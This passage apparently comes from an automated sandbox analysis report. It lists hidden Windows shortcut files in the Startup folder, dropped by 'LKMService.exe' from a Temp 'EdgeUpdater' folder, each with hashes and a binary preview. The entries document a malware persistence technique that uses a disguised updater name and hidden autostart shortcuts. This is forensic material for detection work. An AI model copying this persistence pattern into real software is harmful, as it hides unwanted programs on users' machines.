Preview:	L..................F...."...o.k...........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYL=..Temp..:......CW.^BYL=....l.....................u.J.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d980c39a29e142bfa8ef274b4ed1aa12.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:30 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.965563137294387
Encrypted:	false
SSDEEP:	24:8PpqOpd+E0RugKrQRNglhW8Apfv/42eVvqyFm:8PUOr0RoQrRvggyF
MD5:	E69275BEA5978DBA90BFDBD86F313CBC
SHA1:	D7A23428D8E0A5E147C3EC47C6CDA26E093673E7
SHA-256:	D29F7AAED3C5B41487AD081068129112E8355D94DE29A673173B54359B2A520B
SHA-512:	AC966EB059E83A97DE470D05657B394C30D0D86AB06CBBC6A84BAFFCDF46D7888A9C7A205EC24485FC61C8213901AD531CAE390D8383C3C742A09FC3C931FCED
Malicious:	false
Preview:	L..................F...."...o.k....V.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYP=..Temp..:......CW.^BYP=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e01417b271484156ac672a5446479ed1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:49 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.952496518344712
Encrypted:	false
SSDEEP:	24:8PRY/pd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PRY/r0ROOxrRvggyF
MD5:	52468B9879D092DCE55A55D53576D656
SHA1:	202FC3BD9D8A1600928E6DE11DCC5BF8D39074BF
SHA-256:	16F93F072C870534B138CC80F7946836E86663718ABA17ADE822EA8981547702
SHA-512:	4E5C2292D189E701494134A1614238A1FC6ED7FE10DBA2BF74A245590BD530303F753693519D255498302ECACFC5F7CC56DE5DC1A760731680853E8AA5950598
Malicious:	false
Preview:	L..................F...."...o.k....R,C......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g..............t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0c47395e6c74fcd845a3269ef558b20.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:38 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9522218955942545
Encrypted:	false
SSDEEP:	24:8PpA3pd+E0R6PgKhRNglhW8Apfv/42eVvqyFm:8Pper0R6hrRvggyF
MD5:	0EE9DC51C1C0392136A10BA664555144
SHA1:	0015A94310D701006DC43D61AAE4C596F8ADA8C6
SHA-256:	F6E63C5305E5C59469FD64DEFD49F53969B954327ADB8B4C978A9732288F8E36
SHA-512:	ED363CC69351EA3EF755B53D2CCDDCDA6AA2F3A8E4C5D5E714E4B5684D7618689415E20ED83A1F46F5A032419251D05505B19D9FE31094BE97E6553E150E70C7
Malicious:	false
Preview:	L..................F...."...o.k.....J.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY4=..Temp..:......CW.^BY4=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0c9534ce80c49c0af4bd52b42e11a12.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:11 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9525033018152165
Encrypted:	false
SSDEEP:	24:8P49eA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8PCeer0RSrRvggyF
MD5:	157BCECB24E0D12FFF14FBC0049C3870
SHA1:	A3C3BE9CCE40D6D322E0D1D7019711C44FDFE822
SHA-256:	C5A55721BB46C28B5FEE56D1EF9A922208A5433468998E7C1F7F640F717545D4
SHA-512:	C089E932C286FB0004F8536AEFF9CE196C62A0DB5B370CF52C43AE8C1E3AB8DEA03363D96BDEED243A2F65F6A19DF8F63C3697731DFD7B23C46798EDEAE62F7B
Malicious:	false
Preview:	L..................F...."...o.k.....k.s.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e1cf4741900a453e881fcfa2ba7e919f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:43:04 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.955283973186889
Encrypted:	false
SSDEEP:	24:8P0gU34Cpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8P0gUICr0ROOxrRvggyF
MD5:	240E867FFA73091E5B5FBEDA85B921F9
SHA1:	DB46AF7CDC194851C0EE3C9D1B0BF6BEDB62F9FE
SHA-256:	667AE6034A9FA45C658C637D2B8FC6DDC3BB3C201BE66D560241F91F1D453179
SHA-512:	B1A98198D6ED2B06255215B3DB52BE560FB239B1F1A79106F58302D03E46D088C7AC6E213DAD991A4DFDC41D078E8720DB5CA181E5B67293E3BCB3D304BB477A
Malicious:	false
Preview:	L..................F...."...o.k............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....n.(.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e3f4fb73636f4fca83c9bd2085964f1a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:24 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.954345150062303
Encrypted:	false
SSDEEP:	24:8PBA3pd+E0RLgKDRNglhW8Apfv/42eVvqyFm:8PBer0RXrRvggyF
MD5:	683DAA017E765F59C47597B13A696709
SHA1:	3D316ABB58636BDEA4475762CFB3ED4945E46FA3
SHA-256:	8869D9D9DA25FE36D31D7B07609FEF9F52BB7F6EE92F85A2FB75F432F9E2F673
SHA-512:	EDD4776D7C9B27AE17B2A50F8B8AD92979559032B798A72A5508C7CCB831C7D0AFF642CFE0BAC4DB4FD7D7399510DBCFB5C40FDF00ECC6472F399D8B5A57FC9C
Malicious:	false
Preview:	L..................F...."...o.k....+..{.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY-=..Temp..:......CW.^BY-=....l........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_eca3ad28abbe450283aff29d494ed6a2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:06 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953205953256372
Encrypted:	false
SSDEEP:	24:8PyA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8Pyer0RWSRvggyF
MD5:	574D48CA50C2379FC9A76F30CE6F3775
SHA1:	4DBDF1B88D2E8BCA17F62733872071A880C7C342
SHA-256:	A39712D5FDF1BA33CB6DA00BDD7BF6B42D7189CF862636C32A98CF4E73D259D3
SHA-512:	AC59668C6D561D3CEEE9834397ED5A0EAD1A70865C37D56FBA9E9852020D0E9537E4102BE1E41A6695AD4D0FB36AD85812FB5B0A28896CE82FCA6BF8870DC13C
Malicious:	false
Preview:	L..................F...."...o.k.......p.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ecf4004d53484d75b8484e456ef0640f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:34 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.962931810658801
Encrypted:	false
SSDEEP:	24:8PWOpd+E0REgKrqRNglhW8Apfv/42eVvqyFm:8PWOr0R8qrRvggyF
MD5:	959C79499E99AD5CADA703D2044288D2
SHA1:	3F3BC96DAD5081F59B17DCA9B9831D95E931FD6C
SHA-256:	A88703ACD0DB9B3D39925059548E492E0F7CE0797D5600C7E86AE76C16F8E204
SHA-512:	4CAFA988AC8A8CE7FF2F6C18BAD5D2FFAF945ACA6B20D869055CF39DB9CE876954C5741F1F3C3D8F442BA0E240218B853685A483809E03E49776D807D2A9F8E8
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYR=..Temp..:......CW.^BYR=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed935bc5db44418c9f56cf7b785f1e6a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:07 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.954303328805167
Encrypted:	false
SSDEEP:	24:8PkA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8Pker0RWSRvggyF
MD5:	4DD9A5E2B16AB96155725D04A8D493D1
SHA1:	8D10B214322E259A1FB39FE11A2C0AA019444BA5
SHA-256:	AFF2B44D9E5F7FBE8CAB7F7430CE926AC600E9D3A7E1D1A91BE45866E361F9A4
SHA-512:	52CA6ABC953C38E69A47D6A6685132A3BD348784FCEAA4B2777F0F5010A658F1CC969F47ADFA13F52DC9CA2FBD21303C45922AC789DAEB352567BD76193084C5
Malicious:	false
Preview:	L..................F...."...o.k....}..q.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f133eb79cee444e89efc808a6e2b3ab3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:23 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9475587838344826
Encrypted:	false
SSDEEP:	24:8PKA3pd+E0RygKHFRNglhW8Apfv/42eVvqyFm:8PKer0R4rRvggyF
MD5:	74FE187617B44BB6E230F2BE1D1CC6E3
SHA1:	86A38114B18CE575D2D728CF7FC230B4BA8A192F
SHA-256:	8AF9CCCB0EDC9F81197FD9EE7336975D1AE0B89153328325291A0849AF6D9AD1
SHA-512:	EDEDD672B13F4B528E004194363A0111B9F4B6339FAA5A07EB4A5E999623BBD90C919A321B03833742223B255C0829FD5EE9701D9CB0B8517D6282C8263C0304
Malicious:	false
Preview:	L..................F...."...o.k.......z.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY,=..Temp..:......CW.^BY,=....l.....................,.4.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f2ea0783c74a408480a33bbceb196efd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:47 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.956040595087514
Encrypted:	false
SSDEEP:	24:8P15Opd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8P7Or0ROOxrRvggyF
MD5:	5139CADD18A35B3ACA9E89DD9BE7DA7C
SHA1:	AC8E4CD890F5DB415178C2A7E0261681BCA37D35
SHA-256:	6B5848E8F9FBA9304C12020AD44604F60938938A9709E1FDB085989DD6BCE41A
SHA-512:	6FE6977DDADA4193AA85A502EE0911E95E9B849CB00FC6ACDBB9BB557829A642763D6005A22FF4CA209C3BCF3C4011E78AC9FBA1EBCBA30F2E2AAFCFD9E62CB3
Malicious:	false
Preview:	L..................F...."...o.k............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f441c6ef3f8c4d6baaf89431fdc695c8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:01 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.944648839562194
Encrypted:	false
SSDEEP:	24:8PgA3pd+E0R+gKZz2NglhW8Apfv/42eVvqyFm:8Pger0RAzwRvggyF
MD5:	6B53A69D50C275D518C5E42CD09B3F9D
SHA1:	4EAD46C64C3065C5BF6E8FA33B97B4BAE691E113
SHA-256:	F1663852A87351206ACB1FA64B620CCFF3960CDDEB78EB318C110758B14E9A4C
SHA-512:	8836C16139D70B415072E841D07E3D918C283058F18DFB62F9E95AFA1B0497C20D87FF97C512A525115E3CBF825B85375332F115BD35B2D80328E2A85A74E5B7
Malicious:	false
Preview:	L..................F...."...o.k.....xlm.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY =..EDGEUP~1..H......BY =BY =..........................O ..E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f7151759119841978dc64f02a3cf7575.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:29 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9499188947898665
Encrypted:	false
SSDEEP:	24:8P7A3pd+E0RBgK6iRNglhW8Apfv/42eVvqyFm:8P7er0RDrRvggyF
MD5:	4A6B9FB0454F1862A35EA9FF658A475F
SHA1:	4529074AC2501FDF61EC10F7F50618153728F914
SHA-256:	0A1F62F10A7BC8F75234EE9571B4A78DE492FF911AE1975EBBFBD287EAC709AA
SHA-512:	5CE3003C2620378C1449280B6FDAD0D34E135A527EEDFB07A12CA9C5BCB7EC0110B9D7C9F23FEFA88895CAE71BDD7745DEA4B68B58AFF9DE0F3D25C63B8B853C
Malicious:	false
Preview:	L..................F...."...o.k....8.w~.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY/=..Temp..:......CW.^BY/=....l.....................C.;.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY 